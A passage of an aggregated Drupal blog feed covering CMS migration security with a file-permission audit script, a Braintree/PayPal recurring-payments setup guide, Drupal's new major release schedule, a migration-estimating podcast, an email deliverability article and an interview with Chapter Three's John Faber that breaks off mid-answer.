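printf("alice from the noisy IP: %s\n",
    attemptLogin($pdo, 'alice', '203.0.113.7', true, $t + 30));
```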

Effective user roles and permissions management is also crucial. We ensure that anonymous users don’t have access to modules they shouldn’t. Even for authenticated users, roles are clearly defined. For example, a content manager would only have access to manage content, not to the administrative functions of the website.

We also advocate for strong user authentication methods, like two-factor authentication. While it's up to the client to implement it, we always recommend having secure passwords, especially for admin accounts.

Lastly, we advocate for the use of HTTPS on all websites to ensure secure communication. Having a secure certificate is something we consider a best practice for all our projects.

We ensure HTTPS is used for both back-end and front-end, as we did for the Riverside County project. This is crucial for secure communication.

Implementing enhanced encryption measures

In addition to Drupal’s standard encryption, we applied an extra layer of security. This robust encryption practice was crucial in safeguarding data across various servers, including development, test, and cloud environments.

It was a step beyond the norm, tailored to address the specific security needs of a government project like Riverside County.

Strategic file migration and file permissions for enhanced security

Another aspect of our strategy was the migration of files as media entities within Drupal. This approach not only offered enhanced security for sensitive documents, such as resumes and cover letters, but also improved their usability within the new system.

Secure file permissions are also a key aspect. File permissions should be configured to grant access only as necessary. This applies not just to user-uploaded files like PDFs or Excel documents, but also to core code files, like PHP files and autoloaders.

These files execute when a homepage or index page is accessed, so it’s important to set up a secure file hierarchy. The permissions should allow only the necessary user groups, like 'www-data' for Apache, to have execute permissions.

And if it’s a public folder, we adjust permissions accordingly. For example, administrators or content managers might have write permissions, and users might be allowed to upload resumes. But execute permissions are always given with utmost caution to maintain security.

By the way, this approach to securing file permissions isn’t client-specific; it’s a standard practice at Promet to ensure a secure website.
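A permissions review like the one described in this section can be automated with a small audit script. The following is an added example, not Promet's tooling; it assumes a POSIX file system and PHP 8, and the directory layout, file names and the three rules are constructed for illustration.

```php
<?php
declare(strict_types=1);

/**
 * Walks $root and returns findings as "relative/path: reason" strings.
 * $uploadDir is the directory that holds user-uploaded files.
 */
function auditTree(string $root, string $uploadDir): array
{
    $findings = [];
    $walker = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS),
        RecursiveIteratorIterator::SELF_FIRST
    );
    foreach ($walker as $path => $info) {
        $mode = $info->getPerms() & 0777;
        $relative = substr($path, strlen($root) + 1);
        $inUploads = str_starts_with($path, $uploadDir . '/');

        // Rule 1: nothing in the tree should be writable by every local user.
        if ($mode & 0002) {
            $findings[] = sprintf('%s: world-writable (%04o)', $relative, $mode);
        }
        if ($info->isFile() && $inUploads) {
            // Rule 2: uploaded documents never need an execute bit.
            if ($mode & 0111) {
                $findings[] = sprintf('%s: execute bit set in upload directory (%04o)', $relative, $mode);
            }
            // Rule 3: script files do not belong among uploads at all.
            if (preg_match('/\.(php|phtml|phar)$/i', $path) === 1) {
                $findings[] = sprintf('%s: script file in upload directory', $relative);
            }
        }
    }
    sort($findings);
    return $findings;
}

// --- Demo on a constructed tree in the system temp directory ------------------
$root = sys_get_temp_dir() . '/perm-audit-' . bin2hex(random_bytes(4));
$uploads = $root . '/sites/default/files';
mkdir($uploads, 0755, true);

// Constructed files: path => mode. chmod() is used so the umask does not matter.
$sample = [
    $root . '/index.php'                  => 0644, // fine
    $root . '/sites/default/settings.php' => 0666, // world-writable configuration
    $uploads . '/resume.pdf'              => 0644, // fine
    $uploads . '/cover-letter.pdf'        => 0755, // execute bit on a document
    $uploads . '/notes.php'               => 0644, // script among uploads
];
foreach ($sample as $file => $mode) {
    file_put_contents($file, "constructed sample\n");
    chmod($file, $mode);
}

foreach (auditTree($root, $uploads) as $finding) {
    echo $finding, "\n";
}

// Remove the constructed tree again, children before parents.
$cleanup = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS),
    RecursiveIteratorIterator::CHILD_FIRST
);
foreach ($cleanup as $path => $info) {
    $info->isDir() ? rmdir($path) : unlink($path);
}
rmdir($root);
```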

Maintaining discretion for sensitive information

A unique requirement of this government project was the careful handling of highly sensitive information. For instance, ensuring that phone numbers of higher authorities were not immediately visible on the website, but accessible through multiple layers of screening.

This level of discretion was crucial in upholding the privacy and security standards expected of a government site.

On data privacy

Regarding GDPR compliance, we support various compliance tools like OneTrust or Cookiebot, depending on the client's requirements. Some clients are keen on GDPR compliance, so we ensure their sites adhere to these regulations, including the use of cookie banners. However, if a client doesn't require it, we may not implement such features.

Have a secure CMS migration journey with Promet Source

When it comes to CMS migration, you need a balanced approach that prioritizes both technical precision and security.

As we’ve explored, the key to a successful migration lies not just in the tools and strategies employed but also in a deep understanding of the potential vulnerabilities and a commitment to proactive security measures.

Whether it's managing intricate government data or ensuring the integrity of a private enterprise’s digital assets, the principles of diligence, thoroughness, and continual vigilance remain paramount.

Remember, a secure migration is a journey that extends beyond the technical transfer of data. It’s about building a foundation of trust and reliability, ensuring that your data remains protected, and your digital presence robust and resilient in the face of evolving cyber threats.

Are you preparing for a CMS migration and concerned about the security of your data? Our team of experts is here to guide you through every step of this critical process. With our deep expertise in CMS migration and a focus on robust security practices, we ensure your transition is not only smooth but also fortified against potential risks.

Connect with us for a personalized consultation, and let’s ensure your CMS migration is a secure, seamless, and successful journey. Your digital assets are invaluable—let’s protect them together.

Nov 30 2023

Would you like to offer a recurring payment option in your online store? If so, this article is for you. You'll learn how to configure the Drupal Commerce Braintree module enabling payment processing through the Braintree gateway, how to link it to your PayPal account, and how to test and successfully launch this solution on your Drupal platform for online selling.

What is Braintree?

Braintree is an online payment service offered by PayPal that makes it easy to accept payments on websites and mobile apps. It provides support for various payment methods, including credit and debit cards, PayPal, Apple Pay, Google Pay, and others.

Braintree PayPal functionality includes:

  • Seamless integration: Braintree ensures convenient SDKs (Software Development Kits), which are a set of tools that facilitate integration with various platforms and technologies.
  • Multi-currency support: the service supports payments in more than 130 currencies, making it an attractive solution for companies operating in international markets.
  • Advanced risk management tools: Braintree offers various risk management and fraud prevention tools, such as 3D Secure and Advanced Fraud Tools.

Braintree is, therefore, a comprehensive ecommerce solution that allows you to manage online payments in a simple and secure way.

Installing the required modules in Drupal Commerce

If you have followed my previous article on recurring payments/subscriptions in Drupal Commerce using the Commerce Recurring module as an example, you most likely already have all the required modules.

As a reminder, these are:

You install the modules by calling the command in the terminal:

composer require drupal/commerce_recurring drupal/commerce_braintree

Or by downloading them directly from drupal.org and unzipping them to the /modules/contrib directory.

After Composer finishes downloading, go to the module list page (/admin/modules) and activate all the ones mentioned earlier, or use Drush:

drush en commerce_recurring commerce_braintree

Creating and configuring the Braintree gateway

The Drupal Commerce ecosystem offers more than 100 pre-built modules that support various payment services, such as Amazon Pay, iDEAL, PayU, Stripe, PayPal, or Braintree (see the documentation for the complete list). In this blog post, we'll focus on configuring the latter, going through the entire process step by step. 

Obtaining Braintree API keys

In order to properly configure the payment gateway, you’ll need a Sandbox account, which you’ll set up at Braintree. You’ll also require a pair of keys for the application, which you’ll obtain from the developer section of the website. The registration process is straightforward and intuitive.

After creating an account, go to https://sandbox.braintreegateway.com/login and log in using the information you provided at registration. Click on the cogwheel icon in the upper right corner and go to the API subpage. In the API keys section, you can see an entry for your API key. 

Obtaining API keys in Braintree is one of the steps in setting up a payment gateway for a store.

Source: sandbox.braintreegateway.com

Click the View link to see the details. Leave the tab open, as you’ll need it for further configuration.

The Client library key in Braintree contains information such as private key and merchant ID.


Merchant account ID

The additional information you need is the Merchant Account ID. This is a different value than the Merchant ID. To set it, click the cogwheel icon and go to the Business tab.

Merchant Account ID is a unique alphanumeric string you can set yourself for easier identification. The important thing here is that when you create a new Merchant Account, you set the main currency in which you’ll accept payments. 

The Braintree application allows you to set the currency in your account to accept payments.


Drupal Commerce-side configuration

After installing the module, go to the /admin/commerce/config/payment-gateways subpage, where you’ll find a list of all payment gateways configured on your Drupal Commerce platform. Click the Add payment gateway button.

The Name field is the name that will identify your gateway on the admin panel side. From the Plugin list, select Braintree (Hosted Fields).

At this stage, in the Mode section, set the Test mode, and in the Payment method types field, select the payment methods you want to accept (currently, the module for Drupal only supports direct payment by credit card and PayPal).

Further down, there are additional options for configuring the plugin. When checked, Collect billing information causes the billing form data to be stored in Drupal. As the disclaimer under the box states, before unchecking it make sure that you can legally opt out of this option and rely only on the data stored in Braintree.

The example of configuring options on a Braintree account for an online store on Drupal Commerce.


Then fill in the fields Public key, Merchant ID, Private key, and Merchant account ID with the data obtained from Braintree. You can also enforce 3D Secure, which enables strong authentication in line with the Payment Services Directive 2 (PSD2).

The Enable Credit Card Icons option is strictly visual and determines whether payment card icons will be visible in the payment form:

In the Braintree account, it is possible to set the payment card icons visible in the online store.


In the Conditions section, you can decide under which conditions the defined payment gateway will be available, such as when the customer is logged in or has products in the shopping cart for a certain amount. After configuring this section, click Save to move to the list of payment gateways.

You can also define a condition by which Braintree will be available only for subscription products, leaving other payment gateways for the rest of the products. 

The Braintree PayPal module allows you to set up a payment gateway for subscription products only.


Payment testing

Now you can add the product to your cart and go through the entire checkout flow, which is the process of completing your order. When you reach the payment step, select a payment card. According to the PayPal Braintree test instructions, the test details are: card number 4111 1111 1111 1111, any expiration date later than the current month and year, and any CVV code.

At the Braintree PayPal payment testing stage, you need to enter test payment card details.


Once you’ve moved on and completed the checkout process, you’ve created a subscription. You can check its current status by going to [page_drupal]/admin/commerce/subscriptions on your website. There you’ll find the details:

Once Braintree is configured, you can see the subscription details on settings in the Drupal panel.


In this case, the purchased subscription has been configured to renew every hour. Payments are created to cover the following set periods. Similarly, you can look at the panel in Braintree, which is available in the Transactions tab. 

In the transactions tab of the Braintree PayPal dashboard, you can see the details of all payments.

PayPal payment integration

While payment by card is available immediately after installing the module ("out-of-the-box"), PayPal payment requires additional configuration on the Braintree side. So navigate via the cogwheel icon to the Processing tab. Here, you can choose which payment methods are accepted for your application. Under the PayPal switch, click Link Sandbox. 

The PayPal payment option in the Braintree gateway requires additional configuration in the panel.

Obtaining PayPal API keys

In order to properly configure the payment gateway, you’ll need an account that you set up with PayPal and a pair of keys for the application, which you’ll obtain from the developer section of the website. The registration process is highly intuitive.

After creating an account, go to https://developer.paypal.com/. In the upper right corner, there is a Log in to Dashboard button that you need to press. Once logged in, go to Apps & Credentials. A web page will appear so you can manage your applications.

In your PayPal account in the Apps & Credentials section, you can manage your connected applications


Source: developer.paypal.com

In the upper right corner of the web page is the Sandbox/live switch. To begin with, focus on setting up the gateway in Sandbox mode, so click Sandbox.

In the REST API apps section, click the Create app button. In the App name field, enter a name for your app so that you can identify it in the PayPal developer panel.

In the Sandbox business account field, you may notice that there are two email addresses to choose from: one in the personal domain and the other in the business domain. These are test accounts created by default on PayPal to test payments. If you need additional accounts, you can create them by clicking Sandbox > Accounts in the left-hand menu and then Create account. Select the account in the @business.example.com domain as the account that will "own" the application you’re creating.

 You can create a new application for an online store or marketplace platform in your PayPal account.


As you’ll see later in the blog post, in the live mode, this field is skipped, as the application keys are linked directly to the PayPal account by default. Once the process is complete, you’ll see information about the created application.

In the Sandbox account field, you’ll see the sandbox email address set as "owner." At this point, you’re interested in the Client ID and Secret areas (you may have to press the Show button to reveal them). This key pair allows you to communicate with PayPal's API.

You can find a pair of keys in the PayPal account to communicate with the PayPal API for integration


Below, you’ll find other configuration options, such as setting the address to which users should be redirected after a completed transaction. We recommend checking the Transaction Search box, which is unchecked by default and offers access to transaction history. After making changes, Save them.

Then, you need to complete the required data in the Braintree module configuration.

The Braintree module configuration allows you to set the subscriptions, invoices or PayPal data.
 

Checkout flow

Now, during the checkout process, you can select PayPal as a payment option (remember to enable it in the gateway settings). After selecting it, you’ll see a yellow PayPal button.

Because the gateway is currently running in Sandbox test mode, you need Sandbox account details. To get them, go to the Sandbox > Accounts tab on the PayPal developer page. There, you’ll see a list of developer accounts assigned to your account.

The PayPal platform allows testing any configuration changes in a virtual Sandbox test environment.


Remembering that you’ve assigned an account in the business.example.com domain to your application, click View/edit account for the personal.example.com domain. From the window that appears, copy the Email ID and System generated password (you can change the password at any time by clicking Change password) and paste them into the corresponding fields in the login window that appeared during the purchase process.

Braintree PayPal - go live

After testing the operation, you can switch to Live mode. The process looks identical to the Sandbox application.

To do this, return to the dashboard on the PayPal developer website and Braintree. Click Live in the toggle at the top of the web page and then Create new app. Go through the identical process as before, ending with receiving the keys. Then, go back to the payment gateway settings, switch the checkbox to Live, and fill in the new data.

Congratulations! You’ve successfully set up the Braintree payment gateway and linked it to your PayPal account.
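The settings chosen in the steps above (Mode, the Braintree keys, 3D Secure) can be checked automatically before each deployment. The Python script below is an added example, not code from this article or from the Commerce Braintree module; it assumes the gateway has been exported with Drupal's configuration export, and the YAML key names and both sample files are assumptions constructed for illustration.

```python
"""Added example: audit an exported Drupal Commerce payment gateway config."""
import re

# Constructed sample of an exported gateway config file. The key names
# (mode, private_key, 3d_secure, ...) are assumptions for illustration.
SAMPLE_EXPORT = """\
id: braintree
plugin: braintree_hostedfields
configuration:
  mode: test
  payment_method_types:
    - credit_card
  collect_billing_information: true
  merchant_id: EXAMPLE_MERCHANT_ID
  public_key: EXAMPLE_PUBLIC_KEY
  private_key: EXAMPLE_PRIVATE_KEY_VALUE
  3d_secure: false
conditions: {  }
"""

# Constructed hardened counterpart: live mode, 3D Secure enforced and no
# secret in the export (the key is expected to be injected at runtime).
HARDENED_EXPORT = """\
id: braintree
plugin: braintree_hostedfields
configuration:
  mode: live
  merchant_id: EXAMPLE_MERCHANT_ID
  public_key: EXAMPLE_PUBLIC_KEY
  private_key: ''
  3d_secure: true
conditions: {  }
"""


def read_configuration(yaml_text):
    """Return the scalar keys nested directly under 'configuration:'."""
    settings, inside = {}, False
    for line in yaml_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if not line.startswith(" "):
            # A top-level key opens or closes the configuration block.
            inside = line.strip() == "configuration:"
            continue
        match = re.match(r"^  ([A-Za-z0-9_]+):\s*(.*)$", line)
        if inside and match:
            settings[match.group(1)] = match.group(2).strip().strip("'\"")
    return settings


def audit_gateway(yaml_text, environment):
    """List risky settings for the given environment name."""
    settings = read_configuration(yaml_text)
    findings = []
    if settings.get("private_key"):
        findings.append("private_key is stored in the exported config file")
    mode = settings.get("mode", "")
    if environment == "production" and mode != "live":
        findings.append("production gateway is in mode '%s'" % mode)
    if environment != "production" and mode == "live":
        findings.append("mode is 'live' outside production: real payment "
                        "methods would be charged")
    if settings.get("3d_secure", "false") in ("false", "0", ""):
        findings.append("3D Secure is not enforced")
    return findings


if __name__ == "__main__":
    for finding in audit_gateway(SAMPLE_EXPORT, "production"):
        print("FINDING:", finding)
```

A non-empty result is a reason to stop the deployment; the private key itself can be supplied at runtime through a configuration override in settings.php rather than committed with the exported configuration.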

Recurring payments in Drupal Commerce - summary

From our experience with the implemented Drupal Commerce services, we know that setting up recurring payments isn’t complicated. And if you’ve been following the blog post on subscriptions mentioned at the beginning of this text, you already have everything set up. In case your subscriptions are product-based, you don't need to do anything else – just have your customers select the options provided by Braintree as their payment method, and the Commerce Recurring module will take care of the rest.

Nov 30 2023

Drupal core has just announced a new major release schedule. Major releases will come out every two years and be supported until at least two more major versions have been released (i.e. for at least four years). The new schedule will provide Drupal websites with a reliable foundation of support and security while allowing a longer window to update to new major versions.

This marks the first major change to Drupal core’s release cycle for seven years, so it’s worth some background on how we got here.

With the release of Drupal 8.0.0 in 2016, we started to release patch versions every month, and a new minor every six months. Previous versions of Drupal core didn’t have the concept of patch and minor releases, so this was a completely new process, but it’s one that we’ve stuck with since.

However, what we didn’t have a plan for in 2016 was how to manage new major releases. All we knew was that we didn’t want to keep doing major releases like we’d done previously with Drupal 8, 7, 6 and earlier. Major releases would drop some backwards compatibility layers and deprecated code, remove some old database updates, but the rest was still to be defined.

During Drupal 8, we updated a full major version of Symfony from version 2 to 3 without releasing a new major version of Drupal core. This led to more disruption in minor releases than we would allow now, so we decided not to do that again.

However, not updating dependencies to new major versions means that any one major version was stuck on the same ones it started with. Both Drupal 8.9 and Drupal 9.5 had shorter EOLs than core committers were comfortable with, driven by the EOLs of Symfony and CKEditor 4.

Unless we wanted to assume security responsibility for outdated versions of Symfony or CKEditor 4, we had no choice but to drop support when they did. This led to a rush where all contrib modules and all sites needed to go from one major version to the next within the space of around twelve months. Many people will still be in the middle of this rush with Drupal 9.5 to 10.0.

While we knew this was a problem from around the release of Drupal 9.0, solving it was a bit harder, and required solving several complex issues:

1. Version dependencies

We needed to ensure that new major versions of Drupal were on the most recent versions of its dependencies. Drupal 10 was the first release to achieve this, using both Symfony 6 and CKEditor 5. This required a major effort to jump from Symfony 4 to Symfony 6, providing bridges between the two where we could, as well as a complete rewrite of our CKEditor integration from version 4 to 5.

2. Dual-version support

We needed to figure out how to support two major versions for a much longer overlapping period. With Drupal 8 and 9, while the EOLs came up very quickly after the new major release, it also meant that modules only had to worry about supporting two major versions for approximately one year. It also meant that we would generally not try to update minor versions of dependencies or add support for new PHP versions.

The two-year overlap for major releases, combined with a major release every two years, means that we will always be supporting two major releases, all the time (as well as sometimes working on the development branch for the next one).

Our first idea was to just extend security support for the older major release for an extra year; however, this runs into three problems:

PHP’s three year support cycle meant that if you don’t add support for new PHP versions for two years, you barely have security coverage. The PHP team appears to have realized this is a wider problem for downstream projects, and might be extending security support from three years to four.

Also, since new APIs and deprecations will be added every six months in the new major version, over two years this massively increases the likelihood that contrib modules won’t be able to support both core versions with a single branch.

We generally try to restrict minor releases of PHP and JavaScript dependencies to minor releases of Drupal core, but many dependencies only provide 6-12 months of security coverage for a minor release.

One possible solution was to allow for unscheduled minor releases, for example to update to a new minor release of a dependency if it dropped support for an older version of PHP. However, a site that hasn’t done a minor update for 18 months suddenly faced with a new minor release might not be able to apply that easily.

The path forward 

The solution we eventually came up with was to continue releasing ‘maintenance’ minor releases for the older major version. These will contain a subset of issues committed to the new major release, mostly PHP compatibility issues, API additions, and dependency updates. The hope is that this will allow contrib module developers to more easily support both major versions by reducing divergence over time, keep core up-to-date with dependencies, and allow sites to stay up-to-date with newer versions of PHP. All of these should combine to make it easier (or at least, not harder than now) for sites to move to new major versions when they’re ready, just with a longer timeline to do so.

Nov 29 2023

The Technical Working Group (TWG) is announcing two coding standards changes for final discussion. Feedback will be reviewed at the meeting scheduled for Wednesday 20 December 2200 UTC.

Issues for discussion

The Coding Standards project page outlines the process for changing Drupal coding standards.

Join the team working on Coding Standards

Join #coding-standards in Drupal Slack to meet and work with others on improving the Drupal coding standards. We work on improving our standards as well as implementing them in the core software.

Nov 28 2023

Part 1 | Part 2 | Part 3

Hosted by Michael Meyers, Managing Director of Tag1 Consulting, and Janez Urevc, Sr. Engineer at Tag1, this podcast series focuses on the strategies involved in upgrading and migrating Drupal websites and applications.


In this episode, the hosts are again joined by Drupal Expert Lucas Hedding, and they dive into the complex world of estimating Drupal migrations. The discussion aims to answer the often-asked question: "How much will my platform migration cost?" The team outlines that there's no one-size-fits-all answer, and the process involves a variety of methodologies. Some methods can produce quick but potentially less accurate estimates, while others are more labor-intensive but yield more reliable results.

The conversation also covers how we at Tag1 approach our estimating process, employing a blend of bottom-up, three-point, and parametric methodologies. These detailed estimation techniques often increase client confidence and successful project partnerships.

Listen in to learn more!


Please let us know if you have specific migration-related topics you'd like to see us cover. Or, reach out and let us know if we can be an active part of ensuring your migration is a success!

For a transcript of this video, see A Guide to Estimating Migrations - How Much Will My Drupal Migration Cost? Part 2/3.

Nov 28 2023

Introduction

Email marketing is celebrated for its exceptional return on investment, with a study by Litmus claiming an ROI of $36 for every $1 spent. But when emails fail to reach inboxes, this ROI is bound to decrease drastically. This is why ensuring deliverability is important for any successful email marketing campaign.

Unfortunately, email marketing delivery is getting complicated. A recent study shows that over 20% of marketing emails never reach the recipient's inbox. Evolving subscriber preferences and new technology trends add to this complexity.

Salesforce Marketing Cloud Engagement provides an easy-to-use solution for these challenges across industries. It helps users set up marketing campaigns and ensure effective monitoring at every stage.

What Is Deliverability?

Email deliverability refers to the ability of an email to reach the recipient's inbox without being filtered or marked as spam. It is a crucial metric in email marketing, ensuring that messages are successfully delivered to the intended audience. Several factors influence deliverability, including sender reputation, content quality, and adherence to industry best practices.

High deliverability rates are essential for the success of email campaigns, as emails that end up in spam folders or are blocked can result in missed opportunities and decreased engagement. To optimize deliverability, marketers employ various strategies such as:

  • Maintaining a clean and engaged subscriber list
  • Crafting relevant and valuable content
  • Monitoring and improving sender reputation through proper authentication and feedback

Deliverability Features In Salesforce Marketing Cloud

The Salesforce Marketing Cloud Engagement makes it easier for users to set up and monitor email deliverability across campaigns to ensure that emails get to the subscriber’s inbox. It also provides other benefits like:

  • Scalability

The Marketing Cloud platform provides shared and private IP delivery, allowing users to deliver at high rates, usually above 2 million emails per day, while maintaining a good sender reputation.

  • Reduce Complexity

SFMCE is a single platform that organizations can use to run marketing campaigns at scale. Even if third-party tools are required, the AppExchange platform allows users to integrate the necessary tools within the Marketing Cloud workflow and ensure compliance.

All data processed within the Salesforce Marketing Cloud is done while following the latest security and privacy regulations.

SFMCE also comes with features suited to fulfill various deliverability needs like:

| Deliverability Need | Description | Feature |
| --- | --- | --- |
| Set-Up | Set up an email delivery configuration (IPs, Domains, Domain-based Message Authentication, Reporting, and Conformance (DMARC), and DomainKeys Identified Mail (DKIM)) while maintaining high sender reputation and deliverability | Sender Authentication Package: Allows users to customize links and images to match branding for the sender’s authenticated domain |
| Delivery Monitoring | Monitor and troubleshoot email deliverability | Deliverability Tools & Reports: Helps proactively monitor deliverability, engagement rates, bounce reasons, and domain issues |
| Reputation Monitoring | Monitor and troubleshoot reputation across IPs and Internet Service Providers | Sender Rating Score: Grades the reputation of outgoing mail servers on a scale of 0 to 100. The higher the score, the more trustworthy the sender |
| List Hygiene Monitoring | Filter undeliverable, reputation-damaging, or low-quality subscribers | List Detective: Removes problematic email addresses and domains |

Apart from these standard features, users can leverage advanced deliverability tools through AppExchange.

Deliverability Tools

Tips To Improve Email Deliverability With Salesforce Marketing Cloud

There are several tips that users can employ to improve the deliverability of emails sent through Salesforce Marketing Cloud.

Ensure Compliance

Countries have rolled out laws to control the quality of transactional and commercial emails, like the Controlling the Assault of Non-Solicited Pornography and Marketing Act of 2003 (CAN-SPAM). According to this legislation, commercial emails must feature a functional internet-based opt-out option active for at least 30 days post-sending.

Organizations’ physical mailing addresses should also be visible in the email body. Marketers cannot use false or misleading names, harvest email addresses off the internet, or use open relays to send emails.

Salesforce Marketing Cloud automatically checks for these requirements to ensure that you remain compliant. This ensures a high sender reputation and deliverability.

Email Authentication & IP Warming

Impersonation by spammers is a common threat. To combat this, authenticate your email using standards like DomainKeys Identified Mail (DKIM) and Sender Policy Framework (SPF) to safeguard your brand.

SFMC provides a Sender Authentication Package for managing email authentication, making your emails come across as legitimate. Users can also perform IP warming while migrating to or from Salesforce Marketing Cloud. This involves gradually increasing the volume of your regular emails over a few weeks to prevent ISPs from flagging your new IP address as spam.

Address Book Strategy

Incorporate address book instructions directly into your emails to increase the likelihood of subscribers adding you and reducing the chances of ending up in spam folders. The Add to Address Book tool simplifies this process by offering a hyperlink with instructions for major email providers.

By including this link in your emails, subscribers can easily access instructions on adding your sending address to their address book, ensuring the successful delivery of your future emails.

Ensure Permission

Ensure all the contacts in your subscriber lists have given you permission to email them. High complaint rates are possible if you don't have explicit permission, which can lead to low deliverability and reputation.

Remove Bounced Addresses

If your bounce rate is over 20%, proactively remove your bounced addresses before your next send. A bounce rate of over 20% can dramatically damage your deliverability and ISP reputation. 

Subject Line Engagement & Recognition

Craft a subject line that makes the intention of your email clear, and make sure that your subscribers can recognize your email from the subject line.

Organizations can do this by using subject lines that generate curiosity and contain the organization's name for easy recognition. The Content Detective tool in Email Studio will also help identify spam triggers in your email content.

From Name & Address

Ensure that the 'from name' and 'from email address' are easily identifiable for your subscribers. Some organizations may display only the 'from address,' emphasizing the importance of having a recognizable name instead of a number or cryptic address.

Manage Frequency & Content

Effectively managing email content and frequency is crucial for engaging subscribers. Begin by understanding your audience, segmenting based on preferences, and tailoring content accordingly.

Create a content calendar to plan, ensuring consistency and relevance. Implement personalization, monitor engagement metrics, and regularly optimize content based on feedback. Comply with regulations, conduct A/B testing, and stay adaptable to changing trends.

Segmentation For Personalization

Segment your audience based on their interests, behaviors, and engagement levels. Salesforce Marketing Cloud's segmentation capabilities allow organizations to create highly targeted email lists.

Dynamic Content Personalization

Salesforce Marketing Cloud allows you to dynamically adjust email content based on recipient preferences, behaviors, or demographics. For example, a retailer can use dynamic content to showcase details about women's apparel in the content section for female subscribers and details about men's clothing for male subscribers.

Launch Successful Email Marketing Campaigns With SFMCE

Salesforce Marketing Cloud Engagement makes sure that your emails reach the right audience. It helps create a tangible impact with higher open rates, improved customer engagement, and a stronger brand presence.

With SFMCE, users are not just optimizing for algorithms but also boosting their brand's reliability in their recipients' inboxes. It helps launch successful email marketing campaigns to foster consistent, meaningful communication and connections.

Schedule a call with our experts to learn more about enhancing email campaign deliverability with Salesforce Marketing Cloud Engagement

Nov 28 2023

Agiledrop is highlighting active Drupal community members and interesting projects through a series of interviews. This time we had a great conversation with Chapter Three’s managing partner John Faber about Next-Drupal, the need to change Drupal’s messaging in order to attract more people to the project, and what the future holds for Drupal. We hope you enjoy reading!

1. Please tell us a little about yourself and Chapter Three. How do you participate in the Drupal community and what do you do professionally?

My name is John Faber, and I'm the managing partner of Chapter Three. I've been in the internet business in San Francisco since about 1991 when I started an internet service provider. This was pre-everything. We sold bandwidth in San Francisco during the cowboy days of the internet, which was just so fun and it really was part of why I am still in internet because there was a lot of freedom in what we were doing. 

I sold that in 2000 and we had an economic turndown in 2000 as well, a pretty bad one here in the Bay Area where the whole internet kind of collapsed. And I had sold the company and so I wasn't doing internet stuff in terms of access, but I was looking for other stuff to do. And that is how I came across Drupal.

It was something like Drupal 3.9, really early in the days of Drupal. My drupal.org user ID is 5402. So I have a four-digit D.O account number, going back to how far back I started with all of this. And with Drupal, there was the business opportunity here for me to do website management, and I didn’t have to do all of the website work. It was really the beginning of database-driven websites. 

So I started a little business doing that; I really learned a lot about Drupal but wanted more. And so I ultimately ended up getting a job with a company called af83, out of France, and helping them here in the Bay Area establish themselves a little bit within the Drupal community. af83 then became Commerce Guys. So, I ended up working with Commerce Guys for a little while. And they had a larger vision for Commerce Guys that they were working on.

And I was here in the Bay Area doing that work for them. And then they launched Platform.sh. But in that time, I ended up getting a job at Chapter Three because the owners of Chapter Three were moving to Pantheon and they needed new people to operate the company.

That's where Stephanie and I came in. About 13 years ago we started running Chapter Three together in the same fashion that it always had been run, which was sort of as a well-known boutique Drupal strategy, design, development, training organization. And we have been doing that now side by side for 13 years.

And I guess some of the special sauce in what I do professionally – I am the top of the company with Stephanie, but one of the things that we do as managers is we work side by side with our employees on projects. We're in the trenches with our employees every single day. And that's a little bit different than some other top level management people. We find that doing that shows our employees that we are in it with them.

And the average employee tenure at Chapter Three is about 8.5 years. So we're doing something right at the company. But that's primarily about myself. I live in Lafayette, California, I have an 18 year old son who's in college, and we're still cranking away at Chapter Three every single day.

2. Of course we need to talk about Next-Drupal, the Next.js/Drupal integration by Chapter Three. Can you tell us more about how that came to be and how it’s progressing?

Next-Drupal was started as a side project during COVID, because our team had wanted to get into React and React-based headless websites and we had built some sites using Gatsby. And we didn't have a great experience with Gatsby because there was no real-time editing and even there were some bugs in it.

And so I told my team, I'm not doing decoupled, I'm not doing React sites unless you can solve this problem for me, which is, I'd like to replace the Twig templating system with a decoupled system of some sort. And what that means is I have to have all the editorial functions that editors have inside Drupal Twig in my decoupled setup.

And I thought that was a tall order, that there's no way they're going to be able to build that. Lo and behold, they built it, and it works. It might not be 100%, but it works pretty darn good. And what I mean by “it works” is it does replace the Twig templating system to some degree. You can do a lot of content editing on a decoupled website using Drupal.

So Chapter Three saw the potential there and decided to fund it, several hundred thousand dollars worth of work. And then we released it to the community to see if we can energize Drupal a little bit.

So we released it, and I talked to Dries about it and showed it to everybody – and it got some buzz, people were into it. And the project is really cranking along now. It gets downloaded 3,100 times a week out of GitHub. There's a ton of people using it. 

When I was in DrupalCon Europe, Next.js and Next-Drupal is where I saw true innovation coming out of the community. But I'm a little biased because that's sort of what I was looking for.

The project's progressing well. The goal now is to have more community contributions. I don't want it just to be Chapter Three building this thing, I want other people to come in and contribute their ideas and their code to this project so that we can make it more of a community effort. 

And I have this weird vision – when we look at inflection points inside Drupal, so, times when something really, really cool came out, and you just go, wow, that's going to change Drupal. There are not many. I sort of go back to Views; when Earl Miles first came out with Views, people were blown away by its potential, it was a game changer and nobody else had it. It was a visual MySQL query builder for content.

People were blown away, and it really changed Drupal, it energized people to do everything with Views. I sort of see Next-Drupal as the same thing. Let's make it like Views. Let's get it into Core. Let's make it part of Drupal. I don't want it just to be a Chapter Three project. 

I want it to be Drupal because we can then compete in the future of this digital world that we're in. So that's my vision, but I don't want to do that alone. I want the community to help me push that and help that be a community effort. So that's where we're at now.

I will say, the lead engineer who was on it now works at Vercel. And so we have a lot of Vercel viewage on this which is great. But what we need and what I'm pushing for right now is community involvement. 

I know there's Next.js people out there using it. And I know there's shops out there using it. Let's all work together to make it the best project inside Drupal, to energize people to come back to the Drupal community and go, yes, this is cool.

3. So, how can we do this? How can we encourage more people to get involved with Drupal and/or contribute to Drupal?

It's a tall order. I think the messaging from the top needs to improve in order to get people to come back to our community. I think there are things in our community that are exciting. But I feel like the messaging needs to change. And that is what I would do to encourage people to come back to the community. 

I would talk about some of the cool, sexy stuff that's going on inside Drupal and talk about what Drupal really is, which is an OG content architecture platform that we can use in a hybrid decoupled or a fully decoupled setup. 

It appears to me that this would be a good direction to bring people back into our community, because I just don't think that PHP and MySQL are really that attractive and you can't really make a compelling story around PHP for young people.

And so we need something else. I'm not seeing that right now. What I do see is communication about things like Project Browser, Automatic Updates, high-end visual layout builders as being the things that will bring people back to our community, and I respectfully disagree with that.

